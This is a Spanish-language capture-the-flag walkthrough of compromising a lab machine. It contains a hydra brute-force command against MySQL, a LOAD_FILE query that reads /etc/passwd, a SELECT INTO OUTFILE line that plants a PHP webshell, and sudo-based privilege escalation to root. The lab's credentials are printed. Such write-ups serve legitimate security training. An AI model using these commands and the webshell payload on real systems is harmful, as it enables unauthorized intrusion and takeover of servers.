Hacemos el escaneo de nmap:
Esto es lo que corre por el puerto 80:
Probamos en hacer fuzzing web y vemos un archivo index.php:
Debemos de hacer OSINT de esta imagen, donde tenemos una web que se llama yandex.com:
https://yandex.com/
Donde se puede subir una imagen y nos hace una investigación sobre ella, donde vemos los usuarios beavis y buthead:
Llegados a este punto podemos hacer un ataque de fuerza bruta contra la base de datos MySQL utilizando hydra:
hydra -t 64 -l beavis -P /usr/share/wordlists/rockyou.txt mysql://10.10.10.8
Una vez obtenida la contraseña, vamos a entrar en la base de datos y listamos las databases:
mysql -h 10.10.10.8 -u beavis -p rocknroll
Y por aquí tenemos dos credenciales:
beavis:b3@v1$123 butthead:BuTTh3@D!
También dentro de la base de datos es posible leer archivos, por ejemplo el /etc/passwd:
SELECT LOAD_FILE("/etc/passwd");
Ahora si apuntamos contra el archivo index.php que veíamos al principio, podemos ver un comentario dentro de dicho archivo con una ruta:
Lo ponemos en el navegador y sale esto:
En este punto, probamos en cargar una webshell desde la base de datos:
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/M3t4LL1c@/shell.php";
Y obtenemos ejecución remota de comandos:
Codificamos el código de la reverse shell:
Ejecutamos el payload y obtenemos la reverse shell:
Y al ejecutar el comando sudo -l vemos que podemos ejecutar batcat como el usuario beavis:
Seguimos las instrucciones de gtfobins y vemos que nos convertimos en el usuario beavis:
Siendo beavis no enumeramos nada más, pero sí podemos convertirnos en el usuario butthead reutilizando sus credenciales obtenidas de la base de datos:
butthead:BuTTh3@D!
Y si de forma autenticada ejecutamos el comando sudo -l como este usuario, vemos que como root podemos ejecutar su:
Y si ejecutamos el comando sudo -u root /usr/bin/su nos convertimos en root:


















